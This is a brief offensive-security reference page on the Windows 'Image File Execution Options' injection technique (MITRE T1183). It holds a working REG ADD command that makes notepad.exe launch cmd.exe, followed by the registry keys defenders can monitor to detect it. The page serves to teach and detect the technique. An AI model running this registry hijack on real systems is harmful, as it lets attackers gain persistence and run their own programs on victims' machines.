> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/privilege-escalation/t1183-image-file-execution-options-injection.md).

# Image File Execution Options Injection

## Execution

Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:

{% code title="attacker\@victim" %}

```csharp
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"
```

{% endcode %}

Launching a notepad on the victim system:

![](/files/-LJuLi6b-khGlSQqtP4p)

Same from the cmd shell:

![](/files/-LJuLi6n6w1tMjBQhq33)

## Observations

Monitoring command line arguments and events modifying registry keys: `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable>` and `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable>` should be helpful in detecting this attack:

![](/files/-LJuM0ZLJjxu8EvZxHMZ)

![](/files/-LJuM3FP1jAXIjdK0-Nl)

## References

{% embed url="<https://attack.mitre.org/wiki/Technique/T1183>" %}

{% embed url="<https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/>" %}

{% embed url="<https://blogs.msdn.microsoft.com/reiley/2011/07/29/a-debugging-approach-to-ifeo/>" %}
